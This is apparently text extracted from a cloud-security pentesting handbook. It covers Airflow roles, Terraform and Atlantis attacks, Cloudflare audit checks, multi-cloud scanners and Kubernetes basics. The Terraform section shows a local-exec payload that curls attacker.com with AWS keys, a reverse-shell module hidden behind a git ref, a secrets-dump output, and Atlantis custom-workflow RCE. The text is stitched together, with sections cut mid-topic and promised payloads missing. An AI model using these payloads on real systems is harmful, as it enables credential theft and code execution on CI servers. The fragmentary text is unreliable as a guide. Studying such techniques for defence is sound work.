menu access on Documentation, menu access on Docs, menu access on
Jobs, menu access on Audit Logs, menu access on Plugins, menu access on
SLA Misses, menu access on Task Instances, can create on Task Instances,
can delete on Task Instances, menu access on Admin, menu access on
Configurations, menu access on Connections, menu access on Pools, menu
access on Variables, me nu access on XComs, can delete on XComs, can
read on Task Reschedules, menu access on Task Reschedules, can read on
Triggers, menu access on Triggers, can read on Passwords, can edit on
Passwords, menu access on List Users, menu access on Security, menu
access on List Roles, can read on User Stats Chart, menu access on User's
Statistics, menu access on Base Permissions, can read on View Menus,
menu access on Views/Menus, can read on Permission Views, menu access
on Permission on Views/Menus, can get on MenuApi, menu access on
Providers, can create on XComs]
Op
User
[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on
DAG Runs, can read on Task Instances, can edit on Task Instances, can
delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can
read on Audit Logs, can read on ImportError, can read on XComs, can read
on DAG Code, can read on Plugins, can read on DAG Dependencies, can
read on Jobs, can read on My Password, can edit on My Password, can read
on My Profile, can edit on My Profile, can read on SLA Misses, can read on
Task Logs, can read on Website, menu access on Browse, menu access on
DAG Dependencies, menu access on DAG Runs, menu access on
Documentation, menu access on Docs, menu access on Jobs, menu access
on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu
access on Task Instances, can create on Task Instances, can delete on Task
Instances]
Viewer
[can read on DAGs, can read on DAG Runs, can read on Task Instances,
can read on Audit Logs, can read on ImportError, can read on XComs, can
read on DAG Code, can read on Plugins, can read on DAG Dependencies,
can read on Jobs, can read on My Password, can edit on My Password, can
read on My Profile, can edit on My Profile, can read on SLA Misses, can
read on Task Logs, can read on Website, menu access on Browse, menu
access on DAG Dependencies, menu access on DAG Runs, menu access on
Documentation, menu access on Docs, menu access on Jobs, menu access
on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu
access on Task Instances]
Public
[]
terraform-enterprise-security.md
Terraform Lab
Just install terraform in your computer.
Here you have a guide and here you have the best way to download
terraform.
RCE in Terraform
Terraform doesn't have a platform exposing a web page or a network
service we can enumerate, therefore, the only way to compromise terraform
is to be able to add/modify terraform configuration files.
The main way for an attacker to be able to compromise the system where
terraform is running is to compromise the repository that stores
terraform configurations, because at some point they are going to be
interpreted.
Actually, there are solutions out there that execute terraform plan/apply
automatically after a PR is created, such as Atlantis:
atlantis-security.md
If you are able to compromise a terraform file there are different ways you
can perform RCE when someone executed terraform plan or terraform
apply .
Terraform plan
Terraform plan is the most used command in terraform and
developers/solutions using terraform call it all the time, so the easiest way
to get RCE is to make sure you poison a terraform config file that will
execute arbitrary commands in a terraform plan .
That’s it:
provider "evil" {}
Since the provider will be pulled in during the init and run some code
during the plan , you have arbitrary code execution.
Instead of adding the rev shell directly into the terraform file, you can
load an external resource that contains the rev shell:
module "not_rev_shell" {
source =
"[email protected]:carlospolop/terraform_external_module_rev_shell
//modules"
}
In the external resource, use the ref feature to hide the terraform rev
shell code in a branch inside of the repo, something like:
[email protected]:carlospolop/terraform_external_module_rev_shell
//modules?ref=b401d2b
Terraform Apply
Terraform apply will be executed to apply all the changes, you can also
abuse it to obtain RCE injecting a malicious Terraform file with local-
exec. ****You just need to make sure some payload like the following ones
ends in the main.tf file:
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?
access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
Follow the suggestions from the previous technique the perform this
attack in a stealthier way using external references.
Secrets Dumps
You can have secret values used by terraform dumped running
terraform apply by adding to the terraform file something like:
output "dotoken" {
value = nonsensitive(var.do_token)
}
Audit Tools
tfsec: tfsec uses static analysis of your terraform code to spot potential
misconfigurations.
terascan: Terrascan is a static code analyzer for Infrastructure as
Code.
References
Atlantis Security
https://alex.kaskaso.li/post/terraform-plan-rce
backend_config.tf
terraform {
backend "remote" {
hostname = "{ {TFE_HOSTNAME}}"
organization = "{ {ORGANIZATION_NAME}}"
workspaces {
name = "{ {WORKSPACE_NAME}}"
}
}
}
Pivoting
As it was previously mentined, Terrafomr Enterprise Infra may run in any
machine/cloud provides using agents. Therefore, if you can execute code in
this machine, you could gather cloud credentials from the metadata
endpoint (IAM, user data...). Moreover, check the filesystem and
environment variables for other potential secrets and API keys.\ Also,
don't forget to check the network where the machine is located.
Protections
Disabling Remote Operations
Many of Terraform Cloud's features rely on remote execution and are not
available when using local operations. This includes features like Sentinel
policy enforcement, cost estimation, and notifications.
You can disable remote operations for any workspace by changing its
Execution Mode to Local. This causes the workspace to act only as a
remote backend for Terraform state, with all execution occurring on your
own workstations or continuous integration workers.
Webhooks
Atlantis uses optionally Webhook secrets to validate that the webhooks it
receives from your Git host are legitimate.
One way to confirm this would be to allowlist requests to only come from
the IPs of your Git host but an easier way is to use a Webhook Secret.
Note that unless you use a private github or bitbucket server, you will need
to expose webhook endpoints to the Internet.
Atlantis is going to be exposing webhooks so the git server can send it
information. From an attackers perspective it would be interesting to know
if you can send it messages.
Provider Credentials
Atlantis runs Terraform by simply executing terraform plan and
apply commands on the server Atlantis is hosted on. Just like when you
run Terraform locally, Atlantis needs credentials for your specific provider.
It's up to you how you provide credentials for your specific provider to
Atlantis:
The Atlantis Helm Chart and AWS Fargate Module have their own
mechanisms for provider credentials. Read their docs.
If you're running Atlantis in a cloud then many clouds have ways to
give cloud API access to applications running on them, ex:
AWS EC2 Roles (Search for "EC2 Role")
GCE Instance Service Accounts
Many users set environment variables, ex. AWS_ACCESS_KEY , where
Atlantis is running.
Others create the necessary config files, ex. ~/.aws/credentials ,
where Atlantis is running.
Use the HashiCorp Vault Provider to obtain provider credentials.
You probably won't find it exposed to the internet, but it looks like by
default no credentials are needed to access it (and if they are
atlantis : atlantis are the default ones).
Server Configuration
Configuration to atlantis server can be specified via command line
flags, environment variables, a config file or a mix of the three.
You can find here the list of flags supported by Atlantis server
You can find here how to transform a config option into an env var
1. Flags
2. Environment Variables
3. Config File
Note that in the configuration you might find interesting values such as
tokens and passwords.
Repos Configuration
Some configurations affects how the repos are managed. However, it's
possible that each repo require different settings, so there are ways to
specify each repo. This is the priority order:
and it's a yaml configuring new settings for each repo (regexes
supported)
3. Default values
PR Protections
Atlantis allows to indicate if you want the PR to be approved by
somebody else (even if that isn't set in the branch protection) and/or be
** mergeable ** (branch protections passed) before running apply. From
a security point of view, to set both options a recommended.
Scripts
The repo config can specify scripts to run before (pre workflow hooks) and
after (post workflow hooks) a workflow is executed.
There isn't any option to allow specifying these scripts in the **repo
/atlantis.yml ** file.
Workflow
In the repo config (server side config) you can specify a new default
workflow, or create new custom workflows. You can also specify which
repos can access the new ones generated. Then, you can allow the
atlantis.yaml file of each repo to specify the workflow to use.
to override the workflow that is going to be used. This will basically give
RCE in the Atlantis server to any user that can access that repo.
# atlantis.yaml
version: 3
projects:
- dir: .
workflow: custom1
workflows:
custom1:
plan:
steps:
- init
- run: my custom plan command
apply:
steps:
- run: my custom apply command
# Get help
atlantis help
You can do this by making Atlantis load an external data source. Just put
a payload like the following in the main.tf file:
Stealthier Attack
You can perform this attack even in a stealthier way, by following this
suggestions:
Instead of adding the rev shell directly into the terraform file, you can
load an external resource that contains the rev shell:
module "not_rev_shell" {
source =
"[email protected]:carlospolop/terraform_external_module_rev_shell
//modules"
}
In the external resource, use the ref feature to hide the terraform rev
shell code in a branch inside of the repo, something like:
[email protected]:carlospolop/terraform_external_module_rev_shell
//modules?ref=b401d2b
Follow the suggestions from the previous technique the perform this
attack in a stealthier way.
Custom Workflow
Running malicious custom build commands specified in an
atlantis.yaml file. Atlantis uses the atlantis.yaml file from the pull
request branch, not of master .\ This possibility was mentioned in a
previous section:
This will basically give RCE in the Atlantis server to any user that can
access that repo.
# atlantis.yaml
version: 3
projects:
- dir: .
workflow: custom1
workflows:
custom1:
plan:
steps:
- init
- run: my custom plan command
apply:
steps:
- run: my custom apply command
repos:
- id: /.*/
apply_requirements: []
PR Hijacking
If someone sends atlantis plan/apply comments on your valid pull
requests, it will cause terraform to run when you don't want it to.
Moreover, if you don't have configured in the branch protection to ask to
reevaluate every PR when a new commit is pushed to it, someone could
write malicious configs (check previous scenarios) in the terraform config,
run atlantis plan/apply and gain RCE.
Webhook Secret
If you manage to steal the webhook secret used or if there isn't any
webhook secret being used, you could call the Atlantis webhook and
invoke atlatis commands directly.
Bitbucket
Bitbucket Cloud does not support webhook secrets. This could allow
attackers to spoof requests from Bitbucket. Ensure you are allowing only
Bitbucket IPs.
--repo-allowlist
Atlantis requires you to specify a allowlist of repositories it will accept
webhooks from via the --repo-allowlist flag. For example:
allowlist=github.com/runatlantis/atlantis,github.com/runatlanti
s/atlantis-tests
allowlist=github.com/runatlantis/*
allowlist=github.yourcompany.com/*
All repositories: --repo-allowlist=* . Useful for when you're in a
protected network but dangerous without also setting a webhook
secret.
This flag ensures your Atlantis install isn't being used with repositories you
don't control. See atlantis server --help for more details.
1. Bake providers into the Atlantis image or host and deny egress in
production.
2. Implement the provider registry protocol internally and deny public
egress, that way you control who has write access to the registry.
3. Modify your server-side repo configuration's plan step to validate
against the use of disallowed providers or data sources or PRs from not
allowed users. You could also add in extra validation at this point, e.g.
requiring a "thumbs-up" on the PR before allowing the plan to
continue. Conftest could be of use here.
Webhook Secrets
Atlantis should be run with Webhook secrets set via the
$ATLANTIS_GH_WEBHOOK_SECRET / $ATLANTIS_GITLAB_WEBHOOK_SECRET
If you are using Azure DevOps, instead of webhook secrets add a basic
username and password.
SSL/HTTPS
If you're using webhook secrets but your traffic is over HTTP then the
webhook secrets could be stolen. Enable SSL/HTTPS using the --ssl-
password=yourPassword flags.
You can also pass these as environment variables
ATLANTIS_WEB_BASIC_AUTH=true ATLANTIS_WEB_USERNAME=yourUsername
and ATLANTIS_WEB_PASSWORD=yourPassword .
References
https://www.runatlantis.io/docs
cloudflare-domains.md
Domain Registration
[ ] In Transfer Domains check that it's not possible to transfer any
domain.
cloudflare-domains.md
Analytics
I couldn't find anything to check for a config security review.
Pages
On each Cloudflare's page:
[ ] The triggers: What makes the worker trigger? Can a user send data
that will be used by the worker?
[ ] In the Settings , check for Variables containing sensitive
information
[ ] Check the code of the worker and search for vulnerabilities
(specially in places where the user can manage the input)
Check for SSRFs returning the indicated page that you can
control
Check XSSs executing JS inside a svg image
Edge Certificates
[ ] Always Use HTTPS should be enabled
[ ] HTTP Strict Transport Security (HSTS) should be enabled
[ ] Minimum TLS Version should be 1.2
[ ] TLS 1.3 should be enabled
[ ] Automatic HTTPS Rewrites should be enabled
[ ] Certificate Transparency Monitoring should be enabled
Security
[ ] In the WAF section it's interesting to check that Firewall and rate
limiting rules are used to prevent abuses.
The Bypass action will disable Cloudflare security features for
a request. It shouldn't be used.
[ ] In the Page Shield section it's recommended to check that it's
enabled if any page is used
[ ] In the API Shield section it's recommended to check that it's
enabled if any API is exposed in Cloudflare
[ ] In the DDoS section it's recommended to enable the DDoS
protections
[ ] In the Settings section:
[ ] Check that the Security Level is medium or greater
[ ] Check that the Challenge Passage is 1 hour at max
[ ] Check that the Browser Integrity Check is enabled
[ ] Check that the Privacy Pass Support is enabled
Access
cloudflare-zero-trust-network.md
Speed
I couldn't find any option related to security
Caching
[ ] In the Configuration section consider enabling the CSAM
Scanning Tool
Workers Routes
You should have already checked cloudflare workers__
Rules
TODO
Network
[ ] If HTTP/2 is enabled, HTTP/2 to Origin should be enabled
[] HTTP/3 (with QUIC) should be enabled
[ ] If the privacy of your users is important, make sure Onion
Routing is enabled
Traffic
TODO
Custom Pages
[ ] It's optional to configure custom pages when an error related to
security is triggered (like a block, rate limiting or I'm under attack
mode)
Apps
TODO
Scrape Shield
[ ] Check Email Address Obfuscation is enabled
[ ] Check Server-side Excludes is enabled
Zaraz
TODO
Web3
TODO
[ ] Check who can access to the application in the Policies and check
that only the users that need access to the application can access.
To allow access Access Groups are going to be used (and
additional rules can be set also)
[ ] Check the available identity providers and make sure they aren't
too open
[ ] In Settings :
[ ] Check CORS isn't enabled (if it's enabled, check it's secure
and it isn't allowing everything)
[ ] Cookies should have Strict Same-Site attribute, HTTP Only
and binding cookie should be enabled if the application is HTTP.
[ ] Consider enabling also Browser rendering for better
protection. More info about remote browser isolation here.
Access Groups
[ ] Check that the access groups generated are correctly restricted to
the users they should allow.
[ ] It's specially important to check that the default access group isn't
very open (it's not allowing too many people) as by default anyone
in that group is going to be able to access applications.
Note that it's possible to give access to EVERYONE and other
very open policies that aren't recommended unless 100%
necessary.
Service Auth
[ ] Check that all service tokens expires in 1 year or less
Tunnels
TODO
My Team
TODO
Logs
[ ] You could search for unexpected actions from users
Settings
[ ] Check the plan type
[ ] It's possible to see the credits card owner name, last 4 digits,
expiration date and address
[ ] It's recommended to add a User Seat Expiration to remove users
that doesn't really use this service
Drone
TeamCity
BuildKite
OctopusDeploy
Rancher
Mesosphere
Radicle
Benchmark checks
This will help you understand the size of the environment and
services used
It will allow you also to find some quick misconfigurations as
you can perform most of this tests with automated tools
Services Enumeration
You probably won't find much more misconfigurations here if
you performed correctly the benchmark tests, but you might find
some that weren't being looked for in the benchmark test.
This will allow you to know what is exactly being used in the
cloud env
This will help a lot in the next steps
Check Exposed services
This can be done during the previous section, you need to find
out everything that is potentially exposed to the Internet
somehow and how can it be accessed.
Here I'm taking manually exposed infrastructure like
instances with web pages or other ports being exposed, and
also about other cloud managed services that can be
configured to be exposed (such as DBs or buckets)
Then you should check if that resource can be exposed or not
(confidential information? vulnerabilities? misconfigurations in
the exposed service?)
Check permissions
Here you should find out all the permissions of each role/user
inside the cloud and how are they used
Too many highly privileged (control everything) accounts?
Generated keys not used?... Most of these check should have
been done in the benchmark tests already
If the client is using OpenID or SAML or other federation
you might need to ask them for further information about
how is being each role assigned (it's not the same that the
admin role is assigned to 1 user or to 100)
It's not enough to find which users has admin permissions "*:*".
There are a lot of other permissions that depending on the
services used can be very sensitive.
Moreover, there are potential privesc ways to follow
abusing permissions. All this things should be taken into
account and as much privesc paths as possible should be
reported.
Check Integrations
It's highly probably that integrations with other clouds or SaaS
are being used inside the cloud env.
For integrations of the cloud you are auditing with other
platform you should notify who has access to (ab)use that
integration and you should ask how sensitive is the action
being performed.\ For example, who can write in an AWS
bucket where GCP is getting data from (ask how sensitive is
the action in GCP treating that data).
For integrations inside the cloud you are auditing from
external platforms, you should ask who has access
externally to (ab)use that integration and check how is
that data being used.\ For example, if a service is using a
Docker image hosted in GCR, you should ask who has
access to modify that and which sensitive info and access
will get that image when executed inside an AWS cloud.
Multi-Cloud tools
There are several tools that can be used to test different cloud environments.
The installation steps and links are going to be indicated in this section.
PurplePanda
A tool to identify bad configurations and privesc path in clouds and
across clouds/SaaS.
Install
GCP
export GOOGLE_DISCOVERY=$(echo 'google:
- file_path: ""
- file_path: ""
service_account_id: "some-sa-
[email protected]"' | base64)
CloudSploit
AWS, Azure, Github, Google, Oracle, Alibaba
Install
# Install
git clone https://github.com/aquasecurity/cloudsploit.git
cd cloudsploit
npm install
./index.js -h
## Docker instructions in github
GCP
## You need to have creds for a service account and set them in
config.js file
./index.js --cloud google --config </abs/path/to/config.js>
ScoutSuite
AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
Install
GCP
SCOUT_FOLDER_REPORT="/tmp"
for pid in $(gcloud projects list --format="value(projectId)");
do
echo "================================================"
echo "Checking $pid"
mkdir "$SCOUT_FOLDER_REPORT/$pid"
scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-
browser --user-account --project-id "$pid"
done
Steampipe
Install Download and install Steampipe (https://steampipe.io/downloads).
Or use Brew:
GCP
# Use https://github.com/turbot/steampipe-mod-gcp-
compliance.git
git clone https://github.com/turbot/steampipe-mod-gcp-
compliance.git
cd steampipe-mod-gcp-compliance
# To run all the checks from the dashboard
steampipe dashboard
# To run all the checks from rhe cli
steampipe check all
AWS
# Install aws plugin
steampipe plugin install aws
Nessus
Nessus has an Audit Cloud Infrastructure scan supporting: AWS, Azure,
Office 365, Rackspace, Salesforce. Some extra configurations in Azure are
needed to obtain a Client Id.
cloudlist
Cloudlist is a multi-cloud tool for getting Assets (Hostnames, IP
Addresses) from Cloud Providers.
Cloudlist
cd /tmp
wget
https://github.com/projectdiscovery/cloudlist/releases/latest/d
ownload/cloudlist_1.0.1_macOS_arm64.zip
unzip cloudlist_1.0.1_macOS_arm64.zip
chmod +x cloudlist
sudo mv cloudlist /usr/local/bin
Second Tab
## For GCP it requires service account JSON credentials
cloudlist -config </path/to/config>
cartography
Cartography is a Python tool that consolidates infrastructure assets and the
relationships between them in an intuitive graph view powered by a Neo4j
database.
Install
# Installation
docker image pull ghcr.io/lyft/cartography
docker run --platform linux/amd64 ghcr.io/lyft/cartography
cartography --help
## Install a Neo4j DB version 3.5.*
GCP
docker run --platform linux/amd64 \
--volume
"$HOME/.config/gcloud/application_default_credentials.json:/app
lication_default_credentials.json" \
-e
GOOGLE_APPLICATION_CREDENTIALS="/application_default_credential
s.json" \
-e NEO4j_PASSWORD="s3cr3t" \
ghcr.io/lyft/cartography \
--neo4j-uri bolt://host.docker.internal:7687 \
--neo4j-password-env-var NEO4j_PASSWORD \
--neo4j-user neo4j
starbase
Starbase collects assets and relationships from services and systems
including cloud infrastructure, SaaS applications, security controls, and
more into an intuitive graph view backed by the Neo4j database.
Install
# You are going to need Node version 14, so install nvm
following https://tecadmin.net/install-nvm-macos-with-homebrew/
npm install --global yarn
nvm install 14
git clone https://github.com/JupiterOne/starbase.git
cd starbase
nvm use 14
yarn install
yarn starbase --help
# Configure manually config.yaml depending on the env to
analyze
yarn starbase setup
yarn starbase run
# Docker
git clone https://github.com/JupiterOne/starbase.git
cd starbase
cp config.yaml.example config.yaml
# Configure manually config.yaml depending on the env to
analyze
docker build --no-cache -t starbase:latest .
docker-compose run starbase setup
docker-compose run starbase run
GCP
## Config for GCP
### Check out: https://github.com/JupiterOne/graph-google-
cloud/blob/main/docs/development.md
### It requires service account credentials
integrations:
-
name: graph-google-cloud
instanceId: testInstanceId
directory: ./.integrations/graph-google-cloud
gitRemoteUrl: https://github.com/JupiterOne/graph-google-
cloud.git
config:
SERVICE_ACCOUNT_KEY_FILE: '{Check
https://github.com/JupiterOne/graph-google-
cloud/blob/main/docs/development.md#service_account_key_file-
string}'
PROJECT_ID: ""
FOLDER_ID: ""
ORGANIZATION_ID: ""
CONFIGURE_ORGANIZATION_PROJECTS: false
storage:
engine: neo4j
config:
username: neo4j
password: s3cr3t
uri: bolt://localhost:7687
#Consider using host.docker.internal if from docker
SkyArk
Discover the most privileged users in the scanned AWS or Azure
environment, including the AWS Shadow Admins. It uses powershell.
Cloud Brute
A tool to find a company (target) infrastructure, files, and apps on the top
cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr,
Linode).
Workspace
workspace-security.md
AWS
aws-security
Azure
Access the portal here: http://portal.azure.com/ To start the tests you should
have access with a user with Reader permissions over the subscription
and Global Reader role in AzureAD. If even in that case you are not able
to access the content of the Storage accounts you can fix it with the role
Storage Account Contributor.
Run scanners
Run the scanners to look for vulnerabilities and compare the security
measures implemented with CIS.
Attack Graph
Stormspotter creates an “attack graph�? of the resources in an Azure
subscription. It enables red teams and pentesters to visualize the attack
surface and pivot opportunities within a tenant, and supercharges your
defenders to quickly orient and prioritize incident response work.
More checks
Check for a high number of Global Admin (between 2-4 are
recommended). Access it on:
https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirector
yMenuBlade/Overview
Global admins should have MFA activated. Go to Users and click on
Multi-Factor Authentication button.
Dedicated admin account shouldn't have mailboxes (they can only
have mailboxes if they have Office 365).
Local AD shouldn't be sync with Azure AD if not
needed(https://portal.azure.com/#blade/Microsoft_AAD_IAM/Active
DirectoryMenuBlade/AzureADConnect). And if synced Password
Hash Sync should be enabled for reliability. In this case it's disabled:
Global Administrators shouldn't be synced from a local AD. Check if
Global Administrators emails uses the domain onmicrosoft.com. If
not, check the source of the user, the source should be Azure Active
Directory, if it comes from Windows Server AD, then report it.
Standard tier is recommended instead of free tier (see the tier being
used in Pricing & Settings or in
https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMe
nuBlade/24)
Periodic SQL servers scans:
Select the SQL server --> Make sure that 'Advanced data security' is
set to 'On' --> Under 'Vulnerability assessment settings', set 'Periodic
recurring scans' to 'On', and configure a storage account for storing
vulnerability assessment scan results --> Click Save
Lack of App Services restrictions: Look for "App Services" in Azure
(https://portal.azure.com/#blade/HubsExtension/BrowseResource/reso
urceType/Microsoft.Web%2Fsites) and check if anyone is being used.
In that case check go through each App checking for "Access
Restrictions" and there aren't rules, report it. The access to the app
service should be restricted according to the needs.
Office365
You need Global Admin or at least Global Admin Reader (but note that
Global Admin Reader is a little bit limited). However, those limitations
appear in some PS modules and can be bypassed accessing the features via
the web application.
Other Cloud Pentesting Guides
https://hackingthe.cloud
kubernetes-basics.md
Pentesting Kubernetes
From the Outside
There are several possible Kubernetes services that you could find
exposed on the Internet (or inside internal networks). If you find them you
know there is Kubernetes environment in there.
pentesting-kubernetes-services.md
attacking-kubernetes-from-inside-a-pod.md
kubernetes-enumeration.md
Another important details about enumeration and Kubernetes permissions
abuse is the Kubernetes Role-Based Access Control (RBAC). If you want
to abuse permissions, you first should read about it here:
kubernetes-role-based-access-control-rbac.md
kubernetes-namespace-escalation.md
kubernetes-pivoting-to-clouds.md
Labs to practice and learn
https://securekubernetes.com/
https://madhuakula.com/kubernetes-goat/index.html
Hardening Kubernetes
kubernetes-hardening
Kubernetes Basics
Support HackTricks and get benefits!
The original author of this page is Jorge (read his original post here)
Architecture & Basics
What does Kubernetes do?
Allows running container/s in a container engine.
Schedule allows containers mission efficient.
Keep containers alive.
Allows container communications.
Allows deployment techniques.
Handle volumes of information.
Architecture
Node: operating system with pod or pods.
Pod: Wrapper around a container or multiple containers with. A
pod should only contain one application (so usually, a pod run
just 1 container). The pod is the way kubernetes abstracts the
container technology running.
Service: Each pod has 1 internal IP address from the
internal range of the node. However, it can be also exposed
via a service. The service has also an IP address and its
goal is to maintain the communication between pods so if
one dies the new replacement (with a different internal IP)
will be accessible exposed in the same IP of the service. It
can be configured as internal or external. The service also
actuates as a load balancer when 2 pods are connected to
the same service.\ When a service is created you can find
the endpoints of each service running kubectl get
endpoints
Note that as the might be several nodes (running several pods), there might
also be several master processes which their access to the Api server load
balanced and their etcd synchronized.
Volumes:
When a pod creates data that shouldn't be lost when the pod disappear it
should be stored in a physical volume. Kubernetes allow to attach a
volume to a pod to persist the data. The volume can be in the local
machine or in a remote storage. If you are running pods in different
physical nodes you should use a remote storage so all the pods can access it.
Other configurations:
ConfigMap: You can configure URLs to access services. The pod will
obtain data from here to know how to communicate with the rest of the
services (pods). Note that this is not the recommended place to save
credentials!
Secret: This is the place to store secret data like passwords, API
keys... encoded in B64. The pod will be able to access this data to use
the required credentials.
Deployments: This is where the components to be run by kubernetes
are indicated. A user usually won't work directly with pods, pods are
abstracted in ReplicaSets (number of same pods replicated), which are
run via deployments. Note that deployments are for stateless
applications. The minimum configuration for a deployment is the
name and the image to run.
StatefulSet: This component is meant specifically for applications like
databases which needs to access the same storage.
Ingress: This is the configuration that is use to expose the application
publicly with an URL. Note that this can also be done using external
services, but this is the correct way to expose the application.
If you implement an Ingress you will need to create Ingress
Controllers. The Ingress Controller is a pod that will be the
endpoint that will receive the requests and check and will load
balance them to the services. the ingress controller will send the
request based on the ingress rules configured. Note that the
ingress rules can point to different paths or even subdomains to
different internal kubernetes services.
A better security practice would be to use a cloud load
balancer or a proxy server as entrypoint to don't have any
part of the Kubernetes cluster exposed.
When request that doesn't match any ingress rule is received,
the ingress controller will direct it to the "Default backend".
You can describe the ingress controller to get the address
of this parameter.
minikube addons enable ingress
$ minikube status
host: Running
kubelet: Running
apiserver: Running
kubeconfig: Configured
$ minikube delete
Deleting "minikube" in virtualbox ...
Removed all traces of the "minikube" cluster
Kubectl Basics
Kubectl is the command line tool fro kubernetes clusters. It
communicates with the Api server of the master process to perform actions
in kubernetes or to ask for data.
kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints
Minikube Dashboard
The dashboard allows you to see easier what is minikube running, you can
find the URL to access it in:
This service will be accessible externally (check the nodePort and type:
LoadBlancer attributes):
---
apiVersion: v1
kind: Service
metadata:
name: mongo-express-service
spec:
selector:
app: mongo-express
type: LoadBalancer
ports:
- protocol: TCP
port: 8081
targetPort: 8081
nodePort: 30000
This is useful for testing but for production you should have only internal
services and an Ingress to expose the application.
Example of Ingress config file
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: dashboard-ingress
namespace: kubernetes-dashboard
spec:
rules:
- host: dashboard.com
http:
paths:
- backend:
serviceName: kubernetes-dashboard
servicePort: 80
Note how the password are encoded in B64 (which isn't secure!)
apiVersion: v1
kind: Secret
metadata:
name: mongodb-secret
type: Opaque
data:
mongo-root-username: dXNlcm5hbWU=
mongo-root-password: cGFzc3dvcmQ=
Example of ConfigMap
A ConfigMap is the configuration that is given to the pods so they know
how to locate and access other services. In this case, each pod will know
that the name mongodb-service is the address of a pod that they can
communicate with (this pod will be executing a mongodb):
apiVersion: v1
kind: ConfigMap
metadata:
name: mongodb-configmap
data:
database_url: mongodb-service
Namespaces
Kubernetes supports multiple virtual clusters backed by the same physical
cluster. These virtual clusters are called namespaces. These are intended
for use in environments with many users spread across multiple teams, or
projects. For clusters with a few to tens of users, you should not need to
create or think about namespaces at all. You only should start using
namespaces to have a better control and organization of each part of the
application deployed in kubernetes.
kube-system: It's not meant or the users use and you shouldn't touch
it. It's for master and kubectl processes.
kube-public: Publicly accessible date. Contains a configmap which
contains cluster information
kube-node-lease: Determines the availability of a node
default: The namespace the user will use to create resources
#Create namespace
kubectl create namespace my-namespace
Note that most Kubernetes resources (e.g. pods, services, replication
controllers, and others) are in some namespaces. However, other resources
like namespace resources and low-level resources, such as nodes and
persistenVolumes are not in a namespace. To see which Kubernetes
resources are and aren’t in a namespace:
You can save the namespace for all subsequent kubectl commands in that
context.
Helm
Helm is the package manager for Kubernetes. It allows to package YAML
files and distribute them in public and private repositories. These packages
are called Helm Charts.
Helm is also a template engine that allows to generate config files with
variables:
Kubernetes secrets
A Secret is an object that contains sensitive data such as a password, a
token or a key. Such information might otherwise be put in a Pod
specification or in an image. Users can create Secrets and the system also
creates Secrets. The name of a Secret object must be a valid DNS
subdomain name. Read here the official documentation.
The Opaque type is the default one, the typical key-value pair defined
by users.
secretpod.yaml
apiVersion: v1
kind: Secret
metadata:
name: mysecret
type: Opaque
data:
username: YWRtaW4=
password: MWYyZDFlMmU2N2Rm
---
apiVersion: v1
kind: Pod
metadata:
name: secretpod
spec:
containers:
- name: secretpod
image: nginx
env:
- name: SECRET_USERNAME
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: SECRET_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
volumeMounts:
- name: foo
mountPath: "/etc/foo"
restartPolicy: Never
volumes:
- name: foo
secret:
secretName: mysecret
items:
- key: username
path: my-group/my-username
mode: 0640
Secrets in etcd
etcd is a consistent and highly-available key-value store used as
Kubernetes backing store for all cluster data. Let’s access to the secrets
stored in etcd:
You will see certs, keys and url’s were are located in the FS. Once you get
it, you would be able to connect to etcd.
#ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path
to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>]
health
Once you achieve establish communication you would be able to get the
secrets:
By default all the secrets are stored in plain text inside etcd unless you
apply an encryption layer. The following example is based on
https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
encryption.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
providers:
- aescbc:
keys:
- name: key1
secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY=
#Any random key
- identity: {}
containers:
- command:
- kube-apiserver
- --encriyption-provider-
config=/etc/kubernetes/etcd/<configFile.yaml>
- mountPath: /etc/kubernetes/etcd
name: etcd
readOnly: true
Scroll down in the volumeMounts to hostPath:
- hostPath:
path: /etc/kubernetes/etcd
type: DirectoryOrCreate
name: etcd
Final tips:
Try not to keep secrets in the FS, get them from other places.
Check out https://www.vaultproject.io/ for add more protection to your
secrets.
https://kubernetes.io/docs/concepts/configuration/secret/#risks
https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-
DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsCo
njur-k8s-Secrets.htm
References
https://sickrov.github.io/
https://www.youtube.com/watch?v=X48VuDVv0do
exposing-services-in-kubernetes.md
Finding Exposed pods via port
scanning
The following ports might be open in a Kubernetes cluster:
Port Process Description
kube-
443/TCP Kubernetes API port
apiserver
2379/TCP etcd
6666/TCP etcd etcd
4194/TCP cAdvisor Container metrics
kube-
6443/TCP Kubernetes API port
apiserver
kube-
8443/TCP Minikube API port
apiserver
kube-
8080/TCP Insecure API port
apiserver
10250/TCP kubelet HTTPS API which allows full mode access
Unauthenticated read-only HTTP port:
10255/TCP kubelet
pods, running pods and node state
kube-
10256/TCP Kube Proxy health check server
proxy
calico-
9099/TCP Health check server for Calico
felix
6782-
weave Metrics and endpoints
4/TCP
30000-
NodePort Proxy to the services
32767/TCP
44134/TCP Tiller Helm service listening
Nmap
nmap -n -T4 -p
443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-
6784,30000-32767,44134 <pod_ipaddress>/16
Kube-apiserver
This is the API Kubernetes service the administrators talks with usually
using the tool kubectl .
Common ports: 6443 and 443, but also 8443 in minikube and 8080 as
insecure.
Check the following page to learn how to obtain sensitive data and
perform sensitive actions talking to this service:
kubernetes-enumeration.md
Kubelet API
